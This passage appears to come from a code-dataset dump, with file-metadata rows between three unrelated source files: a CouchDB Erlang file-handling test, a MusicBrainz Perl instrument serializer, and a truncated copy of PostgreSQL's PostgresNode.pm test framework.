}
}
}
| 31.185629 | 128 | 0.624424 |
ed71f5e8b34ea10976ba6447a4deac8e14a0a12d | 4,099 | t | Perl | apps/couch/test/etap/010-file-basics.t | lazedo/bigcouch | 8e9c1ec0ed1676ff152f10658f5c83a1a91fa8fe | [
"Apache-2.0"
] | 73 | 2015-03-19T04:04:52.000Z | 2021-08-16T10:45:11.000Z | test/etap/010-file-basics.t | timanglade/couchdb | b601286dae04bdc2488a0d9bf028c58e6feb3449 | [
"Apache-2.0"
] | 5 | 2016-04-26T13:19:25.000Z | 2017-03-11T14:11:22.000Z | test/etap/010-file-basics.t | timanglade/couchdb | b601286dae04bdc2488a0d9bf028c58e6feb3449 | [
"Apache-2.0"
] | 13 | 2015-03-27T05:21:42.000Z | 2017-05-22T11:45:30.000Z | #!/usr/bin/env escript
%% -*- erlang -*-
% Licensed under the Apache License, Version 2.0 (the "License"); you may not
% use this file except in compliance with the License. You may obtain a copy of
% the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
% WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
% License for the specific language governing permissions and limitations under
% the License.
filename() -> test_util:build_file("test/etap/temp.010").
main(_) ->
test_util:init_code_path(),
etap:plan(19),
case (catch test()) of
ok ->
etap:end_tests();
Other ->
etap:diag(io_lib:format("Test died abnormally: ~p", [Other])),
etap:bail()
end,
ok.
test() ->
etap:is({error, enoent}, couch_file:open("not a real file"),
"Opening a non-existant file should return an enoent error."),
etap:fun_is(
fun({ok, _}) -> true; (_) -> false end,
couch_file:open(filename() ++ ".1", [create, invalid_option]),
"Invalid flags to open are ignored."
),
{ok, Fd} = couch_file:open(filename() ++ ".0", [create, overwrite]),
etap:ok(is_pid(Fd),
"Returned file descriptor is a Pid"),
etap:is({ok, 0}, couch_file:bytes(Fd),
"Newly created files have 0 bytes."),
etap:is({ok, 0}, couch_file:append_term(Fd, foo),
"Appending a term returns the previous end of file position."),
{ok, Size} = couch_file:bytes(Fd),
etap:is_greater(Size, 0,
"Writing a term increased the file size."),
etap:is({ok, Size}, couch_file:append_binary(Fd, <<"fancy!">>),
"Appending a binary returns the current file size."),
etap:is({ok, foo}, couch_file:pread_term(Fd, 0),
"Reading the first term returns what we wrote: foo"),
etap:is({ok, <<"fancy!">>}, couch_file:pread_binary(Fd, Size),
"Reading back the binary returns what we wrote: <<\"fancy\">>."),
etap:is({ok, <<131, 100, 0, 3, 102, 111, 111>>},
couch_file:pread_binary(Fd, 0),
"Reading a binary at a term position returns the term as binary."
),
{ok, BinPos} = couch_file:append_binary(Fd, <<131,100,0,3,102,111,111>>),
etap:is({ok, foo}, couch_file:pread_term(Fd, BinPos),
"Reading a term from a written binary term representation succeeds."),
BigBin = list_to_binary(lists:duplicate(100000, 0)),
{ok, BigBinPos} = couch_file:append_binary(Fd, BigBin),
etap:is({ok, BigBin}, couch_file:pread_binary(Fd, BigBinPos),
"Reading a large term from a written representation succeeds."),
ok = couch_file:write_header(Fd, hello),
etap:is({ok, hello}, couch_file:read_header(Fd),
"Reading a header succeeds."),
{ok, BigBinPos2} = couch_file:append_binary(Fd, BigBin),
etap:is({ok, BigBin}, couch_file:pread_binary(Fd, BigBinPos2),
"Reading a large term from a written representation succeeds 2."),
% append_binary == append_iolist?
% Possible bug in pread_iolist or iolist() -> append_binary
{ok, IOLPos} = couch_file:append_binary(Fd, ["foo", $m, <<"bam">>]),
{ok, IoList} = couch_file:pread_iolist(Fd, IOLPos),
etap:is(<<"foombam">>, iolist_to_binary(IoList),
"Reading an results in a binary form of the written iolist()"),
    % XXX: How does one test fsync?
etap:is(ok, couch_file:sync(Fd),
"Syncing does not cause an error."),
etap:is(ok, couch_file:truncate(Fd, Size),
"Truncating a file succeeds."),
%etap:is(eof, (catch couch_file:pread_binary(Fd, Size)),
% "Reading data that was truncated fails.")
etap:skip(fun() -> ok end,
"No idea how to test reading beyond EOF"),
etap:is({ok, foo}, couch_file:pread_term(Fd, 0),
"Truncating does not affect data located before the truncation mark."),
etap:is(ok, couch_file:close(Fd),
"Files close properly."),
ok.
| 37.605505 | 79 | 0.63796 |
eda86e620cd55b6d12fb8f2e121a9479a502f64b | 1,278 | pm | Perl | lib/MusicBrainz/Server/WebService/Serializer/JSON/2/Instrument.pm | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 2 | 2019-03-14T05:31:35.000Z | 2019-03-14T05:32:01.000Z | lib/MusicBrainz/Server/WebService/Serializer/JSON/2/Instrument.pm | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 2 | 2021-05-12T00:15:55.000Z | 2022-02-14T04:56:24.000Z | lib/MusicBrainz/Server/WebService/Serializer/JSON/2/Instrument.pm | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 1 | 2020-01-18T14:59:32.000Z | 2020-01-18T14:59:32.000Z | package MusicBrainz::Server::WebService::Serializer::JSON::2::Instrument;
use Moose;
use MusicBrainz::Server::WebService::Serializer::JSON::2::Utils qw( list_of number serialize_entity );
extends 'MusicBrainz::Server::WebService::Serializer::JSON::2';
sub serialize {
my ($self, $entity, $inc, $stash, $toplevel) = @_;
my %body;
$body{name} = $entity->name;
$body{disambiguation} = $entity->comment // "";
$body{description} = $entity->description // "";
return \%body;
};
__PACKAGE__->meta->make_immutable;
no Moose;
1;
=head1 COPYRIGHT
Copyright (C) 2014 MetaBrainz Foundation
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
=cut
| 30.428571 | 102 | 0.742567 |
ed5b4a1c4b53a656ad9932764051c5147d94b7cf | 64,901 | pm | Perl | src/test/perl/PostgresNode.pm | onelazyteam/postgres | ba135fa537ab5c2fca0d589c826ebb3ecf98b2f1 | [
"PostgreSQL"
] | 247 | 2017-10-20T08:41:10.000Z | 2022-02-04T01:08:03.000Z | src/test/perl/PostgresNode.pm | onelazyteam/postgres | ba135fa537ab5c2fca0d589c826ebb3ecf98b2f1 | [
"PostgreSQL"
] | 1,295 | 2015-01-08T14:55:22.000Z | 2022-03-28T00:41:45.000Z | src/test/perl/PostgresNode.pm | onelazyteam/postgres | ba135fa537ab5c2fca0d589c826ebb3ecf98b2f1 | [
"PostgreSQL"
] | 103 | 2015-01-07T14:16:37.000Z | 2022-03-06T07:57:21.000Z |
# Copyright (c) 2021, PostgreSQL Global Development Group
=pod
=head1 NAME
PostgresNode - class representing PostgreSQL server instance
=head1 SYNOPSIS
use PostgresNode;
my $node = PostgresNode->get_new_node('mynode');
# Create a data directory with initdb
$node->init();
# Start the PostgreSQL server
$node->start();
# Change a setting and restart
$node->append_conf('postgresql.conf', 'hot_standby = on');
$node->restart();
# run a query with psql, like:
# echo 'SELECT 1' | psql -qAXt postgres -v ON_ERROR_STOP=1
$psql_stdout = $node->safe_psql('postgres', 'SELECT 1');
# Run psql with a timeout, capturing stdout and stderr
# as well as the psql exit code. Pass some extra psql
# options. If there's an error from psql raise an exception.
my ($stdout, $stderr, $timed_out);
my $cmdret = $node->psql('postgres', 'SELECT pg_sleep(600)',
stdout => \$stdout, stderr => \$stderr,
timeout => 180, timed_out => \$timed_out,
extra_params => ['--single-transaction'],
on_error_die => 1)
print "Sleep timed out" if $timed_out;
# Similar thing, more convenient in common cases
my ($cmdret, $stdout, $stderr) =
$node->psql('postgres', 'SELECT 1');
# run query every second until it returns 't'
# or times out
$node->poll_query_until('postgres', q|SELECT random() < 0.1;|')
or die "timed out";
# Do an online pg_basebackup
my $ret = $node->backup('testbackup1');
# Take a backup of a running server
my $ret = $node->backup_fs_hot('testbackup2');
# Take a backup of a stopped server
$node->stop;
my $ret = $node->backup_fs_cold('testbackup3')
# Restore it to create a new independent node (not a replica)
my $replica = get_new_node('replica');
$replica->init_from_backup($node, 'testbackup');
$replica->start;
# Stop the server
$node->stop('fast');
# Find a free, unprivileged TCP port to bind some other service to
my $port = get_free_port();
=head1 DESCRIPTION
PostgresNode contains a set of routines able to work on a PostgreSQL node,
allowing to start, stop, backup and initialize it with various options.
The set of nodes managed by a given test is also managed by this module.
In addition to node management, PostgresNode instances have some wrappers
around Test::More functions to run commands with an environment set up to
point to the instance.
The IPC::Run module is required.
=cut
package PostgresNode;
use strict;
use warnings;
use Carp;
use Config;
use Cwd;
use Exporter 'import';
use Fcntl qw(:mode);
use File::Basename;
use File::Path qw(rmtree);
use File::Spec;
use File::stat qw(stat);
use File::Temp ();
use IPC::Run;
use PostgresVersion;
use RecursiveCopy;
use Socket;
use Test::More;
use TestLib ();
use Time::HiRes qw(usleep);
use Scalar::Util qw(blessed);
our @EXPORT = qw(
get_new_node
get_free_port
);
our ($use_tcp, $test_localhost, $test_pghost, $last_host_assigned,
$last_port_assigned, @all_nodes, $died);
INIT
{
# Set PGHOST for backward compatibility. This doesn't work for own_host
# nodes, so prefer to not rely on this when writing new tests.
$use_tcp = !$TestLib::use_unix_sockets;
$test_localhost = "127.0.0.1";
$last_host_assigned = 1;
$test_pghost = $use_tcp ? $test_localhost : TestLib::tempdir_short;
$ENV{PGHOST} = $test_pghost;
$ENV{PGDATABASE} = 'postgres';
# Tracking of last port value assigned to accelerate free port lookup.
$last_port_assigned = int(rand() * 16384) + 49152;
}
=pod
=head1 METHODS
=over
=item PostgresNode::new($class, $name, $pghost, $pgport)
Create a new PostgresNode instance. Does not initdb or start it.
You should generally prefer to use get_new_node() instead since it takes care
of finding port numbers, registering instances for cleanup, etc.
=cut
sub new
{
my ($class, $name, $pghost, $pgport) = @_;
my $testname = basename($0);
$testname =~ s/\.[^.]+$//;
my $self = {
_port => $pgport,
_host => $pghost,
_basedir => "$TestLib::tmp_check/t_${testname}_${name}_data",
_name => $name,
_logfile_generation => 0,
_logfile_base => "$TestLib::log_path/${testname}_${name}",
_logfile => "$TestLib::log_path/${testname}_${name}.log"
};
bless $self, $class;
mkdir $self->{_basedir}
or
BAIL_OUT("could not create data directory \"$self->{_basedir}\": $!");
$self->dump_info;
return $self;
}
=pod
=item $node->port()
Get the port number assigned to the host. This won't necessarily be a TCP port
open on the local host since we prefer to use unix sockets if possible.
Use $node->connstr() if you want a connection string.
=cut
sub port
{
my ($self) = @_;
return $self->{_port};
}
=pod
=item $node->host()
Return the host (like PGHOST) for this instance. May be a UNIX socket path.
Use $node->connstr() if you want a connection string.
=cut
sub host
{
my ($self) = @_;
return $self->{_host};
}
=pod
=item $node->basedir()
The directory all the node's files will be within - datadir, archive directory,
backups, etc.
=cut
sub basedir
{
my ($self) = @_;
return $self->{_basedir};
}
=pod
=item $node->name()
The name assigned to the node at creation time.
=cut
sub name
{
my ($self) = @_;
return $self->{_name};
}
=pod
=item $node->logfile()
Path to the PostgreSQL log file for this instance.
=cut
sub logfile
{
my ($self) = @_;
return $self->{_logfile};
}
=pod
=item $node->connstr()
Get a libpq connection string that will establish a connection to
this node. Suitable for passing to psql, DBD::Pg, etc.
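For example, one possible way to hand the string to another tool (the
database name here is only illustrative):
  my $connstr = $node->connstr('postgres');
  print "connect using: psql \"$connstr\"\n";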
=cut
sub connstr
{
my ($self, $dbname) = @_;
my $pgport = $self->port;
my $pghost = $self->host;
if (!defined($dbname))
{
return "port=$pgport host=$pghost";
}
# Escape properly the database string before using it, only
# single quotes and backslashes need to be treated this way.
$dbname =~ s#\\#\\\\#g;
$dbname =~ s#\'#\\\'#g;
return "port=$pgport host=$pghost dbname='$dbname'";
}
=pod
=item $node->group_access()
Does the data dir allow group access?
=cut
sub group_access
{
my ($self) = @_;
my $dir_stat = stat($self->data_dir);
defined($dir_stat)
or die('unable to stat ' . $self->data_dir);
return (S_IMODE($dir_stat->mode) == 0750);
}
=pod
=item $node->data_dir()
Returns the path to the data directory. postgresql.conf and pg_hba.conf are
always here.
=cut
sub data_dir
{
my ($self) = @_;
my $res = $self->basedir;
return "$res/pgdata";
}
=pod
=item $node->archive_dir()
If archiving is enabled, WAL files go here.
=cut
sub archive_dir
{
my ($self) = @_;
my $basedir = $self->basedir;
return "$basedir/archives";
}
=pod
=item $node->backup_dir()
The output path for backups taken with $node->backup()
=cut
sub backup_dir
{
my ($self) = @_;
my $basedir = $self->basedir;
return "$basedir/backup";
}
=pod
=item $node->info()
Return a string containing human-readable diagnostic information (paths, etc)
about this node.
=cut
sub info
{
my ($self) = @_;
my $_info = '';
open my $fh, '>', \$_info or die;
print $fh "Name: " . $self->name . "\n";
print $fh "Version: " . $self->{_pg_version} . "\n"
if $self->{_pg_version};
print $fh "Data directory: " . $self->data_dir . "\n";
print $fh "Backup directory: " . $self->backup_dir . "\n";
print $fh "Archive directory: " . $self->archive_dir . "\n";
print $fh "Connection string: " . $self->connstr . "\n";
print $fh "Log file: " . $self->logfile . "\n";
print $fh "Install Path: ", $self->{_install_path} . "\n"
if $self->{_install_path};
close $fh or die;
return $_info;
}
=pod
=item $node->dump_info()
Print $node->info()
=cut
sub dump_info
{
my ($self) = @_;
print $self->info;
return;
}
# Internal method to set up trusted pg_hba.conf for replication. Not
# documented because you shouldn't use it, it's called automatically if needed.
sub set_replication_conf
{
my ($self) = @_;
my $pgdata = $self->data_dir;
$self->host eq $test_pghost
or croak "set_replication_conf only works with the default host";
open my $hba, '>>', "$pgdata/pg_hba.conf";
print $hba "\n# Allow replication (set up by PostgresNode.pm)\n";
if ($TestLib::windows_os && !$TestLib::use_unix_sockets)
{
print $hba
"host replication all $test_localhost/32 sspi include_realm=1 map=regress\n";
}
close $hba;
return;
}
=pod
=item $node->init(...)
Initialize a new cluster for testing.
Authentication is set up so that only the current OS user can access the
cluster. On Unix, we use Unix domain socket connections, with the socket in
a directory that's only accessible to the current user to ensure that.
On Windows, we use SSPI authentication to ensure the same (by pg_regress
--config-auth).
WAL archiving can be enabled on this node by passing the keyword parameter
has_archiving => 1. This is disabled by default.
postgresql.conf can be set up for replication by passing the keyword
parameter allows_streaming => 'logical' or 'physical' (passing 1 will also
suffice for physical replication) depending on type of replication that
should be enabled. This is disabled by default.
The new node is set up in a fast but unsafe configuration where fsync is
disabled.
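For example, a minimal sketch of a primary prepared for physical
replication and WAL archiving (the node name is only illustrative):
  my $primary = get_new_node('primary');
  $primary->init(allows_streaming => 1, has_archiving => 1);
  $primary->start;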
=cut
sub init
{
my ($self, %params) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $host = $self->host;
local %ENV = $self->_get_env();
$params{allows_streaming} = 0 unless defined $params{allows_streaming};
$params{has_archiving} = 0 unless defined $params{has_archiving};
mkdir $self->backup_dir;
mkdir $self->archive_dir;
TestLib::system_or_bail('initdb', '-D', $pgdata, '-A', 'trust', '-N',
@{ $params{extra} });
TestLib::system_or_bail($ENV{PG_REGRESS}, '--config-auth', $pgdata,
@{ $params{auth_extra} });
open my $conf, '>>', "$pgdata/postgresql.conf";
print $conf "\n# Added by PostgresNode.pm\n";
print $conf "fsync = off\n";
print $conf "restart_after_crash = off\n";
print $conf "log_line_prefix = '%m [%p] %q%a '\n";
print $conf "log_statement = all\n";
print $conf "log_replication_commands = on\n";
print $conf "wal_retrieve_retry_interval = '500ms'\n";
# If a setting tends to affect whether tests pass or fail, print it after
# TEMP_CONFIG. Otherwise, print it before TEMP_CONFIG, thereby permitting
# overrides. Settings that merely improve performance or ease debugging
# belong before TEMP_CONFIG.
print $conf TestLib::slurp_file($ENV{TEMP_CONFIG})
if defined $ENV{TEMP_CONFIG};
# XXX Neutralize any stats_temp_directory in TEMP_CONFIG. Nodes running
# concurrently must not share a stats_temp_directory.
print $conf "stats_temp_directory = 'pg_stat_tmp'\n";
if ($params{allows_streaming})
{
if ($params{allows_streaming} eq "logical")
{
print $conf "wal_level = logical\n";
}
else
{
print $conf "wal_level = replica\n";
}
print $conf "max_wal_senders = 10\n";
print $conf "max_replication_slots = 10\n";
print $conf "wal_log_hints = on\n";
print $conf "hot_standby = on\n";
# conservative settings to ensure we can run multiple postmasters:
print $conf "shared_buffers = 1MB\n";
print $conf "max_connections = 10\n";
# limit disk space consumption, too:
print $conf "max_wal_size = 128MB\n";
}
else
{
print $conf "wal_level = minimal\n";
print $conf "max_wal_senders = 0\n";
}
print $conf "port = $port\n";
if ($use_tcp)
{
print $conf "unix_socket_directories = ''\n";
print $conf "listen_addresses = '$host'\n";
}
else
{
print $conf "unix_socket_directories = '$host'\n";
print $conf "listen_addresses = ''\n";
}
close $conf;
chmod($self->group_access ? 0640 : 0600, "$pgdata/postgresql.conf")
or die("unable to set permissions for $pgdata/postgresql.conf");
$self->set_replication_conf if $params{allows_streaming};
$self->enable_archiving if $params{has_archiving};
return;
}
=pod
=item $node->append_conf(filename, str)
A shortcut method to append to files like pg_hba.conf and postgresql.conf.
Does no validation or sanity checking. Does not reload the configuration
after writing.
A newline is automatically appended to the string.
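For example (the chosen setting is only illustrative):
  $node->append_conf('postgresql.conf', 'log_min_messages = debug1');
  $node->restart;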
=cut
sub append_conf
{
my ($self, $filename, $str) = @_;
my $conffile = $self->data_dir . '/' . $filename;
TestLib::append_to_file($conffile, $str . "\n");
chmod($self->group_access() ? 0640 : 0600, $conffile)
or die("unable to set permissions for $conffile");
return;
}
=pod
=item $node->backup(backup_name)
Create a hot backup with B<pg_basebackup> in subdirectory B<backup_name> of
B<< $node->backup_dir >>, including the WAL.
By default, WAL files are fetched at the end of the backup, not streamed.
You can adjust that and other things by passing an array of additional
B<pg_basebackup> command line options in the keyword parameter backup_options.
You'll have to configure a suitable B<max_wal_senders> on the
target server since it isn't done by default.
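For example, a sketch that streams WAL instead of fetching it at the end
(the backup name and extra option are only illustrative):
  $node->backup('mybackup', backup_options => ['--wal-method=stream']);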
=cut
sub backup
{
my ($self, $backup_name, %params) = @_;
my $backup_path = $self->backup_dir . '/' . $backup_name;
my $name = $self->name;
local %ENV = $self->_get_env();
print "# Taking pg_basebackup $backup_name from node \"$name\"\n";
TestLib::system_or_bail(
'pg_basebackup', '-D',
$backup_path, '-h',
$self->host, '-p',
$self->port, '--checkpoint',
'fast', '--no-sync',
@{ $params{backup_options} });
print "# Backup finished\n";
return;
}
=item $node->backup_fs_hot(backup_name)
Create a backup with a filesystem level copy in subdirectory B<backup_name> of
B<< $node->backup_dir >>, including WAL.
Archiving must be enabled, as B<pg_start_backup()> and B<pg_stop_backup()> are
used. This is not checked or enforced.
The backup name is passed as the backup label to B<pg_start_backup()>.
=cut
sub backup_fs_hot
{
my ($self, $backup_name) = @_;
$self->_backup_fs($backup_name, 1);
return;
}
=item $node->backup_fs_cold(backup_name)
Create a backup with a filesystem level copy in subdirectory B<backup_name> of
B<< $node->backup_dir >>, including WAL. The server must be
stopped as no attempt to handle concurrent writes is made.
Use B<backup> or B<backup_fs_hot> if you want to back up a running server.
=cut
sub backup_fs_cold
{
my ($self, $backup_name) = @_;
$self->_backup_fs($backup_name, 0);
return;
}
# Common sub of backup_fs_hot and backup_fs_cold
sub _backup_fs
{
my ($self, $backup_name, $hot) = @_;
my $backup_path = $self->backup_dir . '/' . $backup_name;
my $port = $self->port;
my $name = $self->name;
print "# Taking filesystem backup $backup_name from node \"$name\"\n";
if ($hot)
{
my $stdout = $self->safe_psql('postgres',
"SELECT * FROM pg_start_backup('$backup_name');");
print "# pg_start_backup: $stdout\n";
}
RecursiveCopy::copypath(
$self->data_dir,
$backup_path,
filterfn => sub {
my $src = shift;
return ($src ne 'log' and $src ne 'postmaster.pid');
});
if ($hot)
{
# We ignore pg_stop_backup's return value. We also assume archiving
# is enabled; otherwise the caller will have to copy the remaining
# segments.
my $stdout =
$self->safe_psql('postgres', 'SELECT * FROM pg_stop_backup();');
print "# pg_stop_backup: $stdout\n";
}
print "# Backup finished\n";
return;
}
=pod
=item $node->init_from_backup(root_node, backup_name)
Initialize a node from a backup, which may come from this node or a different
node. root_node must be a PostgresNode reference, backup_name the string name
of a backup previously created on that node with $node->backup.
Does not start the node after initializing it.
By default, the backup is assumed to be plain format. To restore from
a tar-format backup, pass the name of the tar program to use in the
keyword parameter tar_program. Note that tablespace tar files aren't
handled here.
Streaming replication can be enabled on this node by passing the keyword
parameter has_streaming => 1. This is disabled by default.
Restoring WAL segments from archives using restore_command can be enabled
by passing the keyword parameter has_restoring => 1. This is disabled by
default.
If has_restoring is used, standby mode is used by default. To use
recovery mode instead, pass the keyword parameter standby => 0.
The backup is copied, leaving the original unmodified. pg_hba.conf is
unconditionally set to enable replication connections.
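For example, a sketch that builds a streaming standby from a backup taken
with $primary->backup('mybackup') (names are only illustrative):
  my $standby = get_new_node('standby');
  $standby->init_from_backup($primary, 'mybackup', has_streaming => 1);
  $standby->start;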
=cut
sub init_from_backup
{
my ($self, $root_node, $backup_name, %params) = @_;
my $backup_path = $root_node->backup_dir . '/' . $backup_name;
my $host = $self->host;
my $port = $self->port;
my $node_name = $self->name;
my $root_name = $root_node->name;
$params{has_streaming} = 0 unless defined $params{has_streaming};
$params{has_restoring} = 0 unless defined $params{has_restoring};
$params{standby} = 1 unless defined $params{standby};
print
"# Initializing node \"$node_name\" from backup \"$backup_name\" of node \"$root_name\"\n";
croak "Backup \"$backup_name\" does not exist at $backup_path"
unless -d $backup_path;
mkdir $self->backup_dir;
mkdir $self->archive_dir;
my $data_path = $self->data_dir;
if (defined $params{tar_program})
{
mkdir($data_path);
TestLib::system_or_bail($params{tar_program}, 'xf',
$backup_path . '/base.tar',
'-C', $data_path);
TestLib::system_or_bail(
$params{tar_program}, 'xf',
$backup_path . '/pg_wal.tar', '-C',
$data_path . '/pg_wal');
}
else
{
rmdir($data_path);
RecursiveCopy::copypath($backup_path, $data_path);
}
chmod(0700, $data_path);
# Base configuration for this node
$self->append_conf(
'postgresql.conf',
qq(
port = $port
));
if ($use_tcp)
{
$self->append_conf('postgresql.conf', "listen_addresses = '$host'");
}
else
{
$self->append_conf('postgresql.conf',
"unix_socket_directories = '$host'");
}
$self->enable_streaming($root_node) if $params{has_streaming};
$self->enable_restoring($root_node, $params{standby})
if $params{has_restoring};
return;
}
=pod
=item $node->rotate_logfile()
Switch to a new PostgreSQL log file. This does not alter any running
PostgreSQL process. Subsequent method calls, including pg_ctl invocations,
will use the new name. Return the new name.
=cut
sub rotate_logfile
{
my ($self) = @_;
$self->{_logfile} = sprintf('%s_%d.log',
$self->{_logfile_base},
++$self->{_logfile_generation});
return $self->{_logfile};
}
=pod
=item $node->start(%params) => success_or_failure
Wrapper for pg_ctl start
Start the node and wait until it is ready to accept connections.
=over
=item fail_ok => 1
By default, failure terminates the entire F<prove> invocation. If given,
instead return a true or false value to indicate success or failure.
=back
=cut
sub start
{
my ($self, %params) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $name = $self->name;
my $ret;
BAIL_OUT("node \"$name\" is already running") if defined $self->{_pid};
print("### Starting node \"$name\"\n");
# Temporarily unset PGAPPNAME so that the server doesn't
# inherit it. Otherwise this could affect libpqwalreceiver
# connections in confusing ways.
local %ENV = $self->_get_env(PGAPPNAME => undef);
# Note: We set the cluster_name here, not in postgresql.conf (in
# sub init) so that it does not get copied to standbys.
$ret = TestLib::system_log('pg_ctl', '-D', $self->data_dir, '-l',
$self->logfile, '-o', "--cluster-name=$name", 'start');
if ($ret != 0)
{
print "# pg_ctl start failed; logfile:\n";
print TestLib::slurp_file($self->logfile);
BAIL_OUT("pg_ctl start failed") unless $params{fail_ok};
return 0;
}
$self->_update_pid(1);
return 1;
}
=pod
=item $node->kill9()
Send SIGKILL (signal 9) to the postmaster.
Note: if the node is already known to be stopped, this does nothing.
However, if we think it's running and it's not, it's important for
this to fail. Otherwise, tests might fail to detect server crashes.
=cut
sub kill9
{
my ($self) = @_;
my $name = $self->name;
return unless defined $self->{_pid};
local %ENV = $self->_get_env();
print "### Killing node \"$name\" using signal 9\n";
# kill(9, ...) fails under msys Perl 5.8.8, so fall back on pg_ctl.
kill(9, $self->{_pid})
or TestLib::system_or_bail('pg_ctl', 'kill', 'KILL', $self->{_pid});
$self->{_pid} = undef;
return;
}
=pod
=item $node->stop(mode)
Stop the node using pg_ctl -m $mode and wait for it to stop.
Note: if the node is already known to be stopped, this does nothing.
However, if we think it's running and it's not, it's important for
this to fail. Otherwise, tests might fail to detect server crashes.
=cut
sub stop
{
my ($self, $mode) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $name = $self->name;
local %ENV = $self->_get_env();
$mode = 'fast' unless defined $mode;
return unless defined $self->{_pid};
print "### Stopping node \"$name\" using mode $mode\n";
TestLib::system_or_bail('pg_ctl', '-D', $pgdata, '-m', $mode, 'stop');
$self->_update_pid(0);
return;
}
=pod
=item $node->reload()
Reload configuration parameters on the node.
=cut
sub reload
{
my ($self) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $name = $self->name;
local %ENV = $self->_get_env();
print "### Reloading node \"$name\"\n";
TestLib::system_or_bail('pg_ctl', '-D', $pgdata, 'reload');
return;
}
=pod
=item $node->restart()
Wrapper for pg_ctl restart
=cut
sub restart
{
my ($self) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $logfile = $self->logfile;
my $name = $self->name;
local %ENV = $self->_get_env(PGAPPNAME => undef);
print "### Restarting node \"$name\"\n";
TestLib::system_or_bail('pg_ctl', '-D', $pgdata, '-l', $logfile,
'restart');
$self->_update_pid(1);
return;
}
=pod
=item $node->promote()
Wrapper for pg_ctl promote
=cut
sub promote
{
my ($self) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $logfile = $self->logfile;
my $name = $self->name;
local %ENV = $self->_get_env();
print "### Promoting node \"$name\"\n";
TestLib::system_or_bail('pg_ctl', '-D', $pgdata, '-l', $logfile,
'promote');
return;
}
=pod
=item $node->logrotate()
Wrapper for pg_ctl logrotate
=cut
sub logrotate
{
my ($self) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $logfile = $self->logfile;
my $name = $self->name;
local %ENV = $self->_get_env();
print "### Rotating log in node \"$name\"\n";
TestLib::system_or_bail('pg_ctl', '-D', $pgdata, '-l', $logfile,
'logrotate');
return;
}
# Internal routine to enable streaming replication on a standby node.
sub enable_streaming
{
my ($self, $root_node) = @_;
my $root_connstr = $root_node->connstr;
my $name = $self->name;
print "### Enabling streaming replication for node \"$name\"\n";
$self->append_conf(
'postgresql.conf', qq(
primary_conninfo='$root_connstr'
));
$self->set_standby_mode();
return;
}
# Internal routine to enable archive recovery command on a standby node
sub enable_restoring
{
my ($self, $root_node, $standby) = @_;
my $path = TestLib::perl2host($root_node->archive_dir);
my $name = $self->name;
print "### Enabling WAL restore for node \"$name\"\n";
	# On Windows, the path specified in the restore command needs to use
	# double back-slashes to work properly and to correctly detect the file
	# targeted by the copy command, so the directory value used in this
	# routine, which uses only one back-slash, needs to be properly changed
	# first. Paths also need to be double-quoted to prevent failures where
	# the path contains spaces.
$path =~ s{\\}{\\\\}g if ($TestLib::windows_os);
my $copy_command =
$TestLib::windows_os
? qq{copy "$path\\\\%f" "%p"}
: qq{cp "$path/%f" "%p"};
$self->append_conf(
'postgresql.conf', qq(
restore_command = '$copy_command'
));
if ($standby)
{
$self->set_standby_mode();
}
else
{
$self->set_recovery_mode();
}
return;
}
=pod
=item $node->set_recovery_mode()
Place recovery.signal file.
=cut
sub set_recovery_mode
{
my ($self) = @_;
$self->append_conf('recovery.signal', '');
return;
}
=pod
=item $node->set_standby_mode()
Place standby.signal file.
=cut
sub set_standby_mode
{
my ($self) = @_;
$self->append_conf('standby.signal', '');
return;
}
# Internal routine to enable archiving
sub enable_archiving
{
my ($self) = @_;
my $path = TestLib::perl2host($self->archive_dir);
my $name = $self->name;
print "### Enabling WAL archiving for node \"$name\"\n";
	# On Windows, the path specified in the archive command needs to use
	# double back-slashes to work properly and to correctly detect the file
	# targeted by the copy command, so the directory value used in this
	# routine, which uses only one back-slash, needs to be properly changed
	# first. Paths also need to be double-quoted to prevent failures where
	# the path contains spaces.
$path =~ s{\\}{\\\\}g if ($TestLib::windows_os);
my $copy_command =
$TestLib::windows_os
? qq{copy "%p" "$path\\\\%f"}
: qq{cp "%p" "$path/%f"};
# Enable archive_mode and archive_command on node
$self->append_conf(
'postgresql.conf', qq(
archive_mode = on
archive_command = '$copy_command'
));
return;
}
# Internal method
sub _update_pid
{
my ($self, $is_running) = @_;
my $name = $self->name;
# If we can open the PID file, read its first line and that's the PID we
# want.
if (open my $pidfile, '<', $self->data_dir . "/postmaster.pid")
{
chomp($self->{_pid} = <$pidfile>);
print "# Postmaster PID for node \"$name\" is $self->{_pid}\n";
close $pidfile;
# If we found a pidfile when there shouldn't be one, complain.
BAIL_OUT("postmaster.pid unexpectedly present") unless $is_running;
return;
}
$self->{_pid} = undef;
print "# No postmaster PID for node \"$name\"\n";
# Complain if we expected to find a pidfile.
BAIL_OUT("postmaster.pid unexpectedly not present") if $is_running;
return;
}
=pod
=item PostgresNode->get_new_node(node_name, %params)
Build a new object of class C<PostgresNode> (or of a subclass, if you have
one), assigning a free port number. Remembers the node, to prevent its port
number from being reused for another node, and to ensure that it gets
shut down when the test script exits.
You should generally use this instead of C<PostgresNode::new(...)>.
=over
=item port => [1,65535]
By default, this function assigns a port number to each node. Specify this to
force a particular port number. The caller is responsible for evaluating
potential conflicts and privilege requirements.
=item own_host => 1
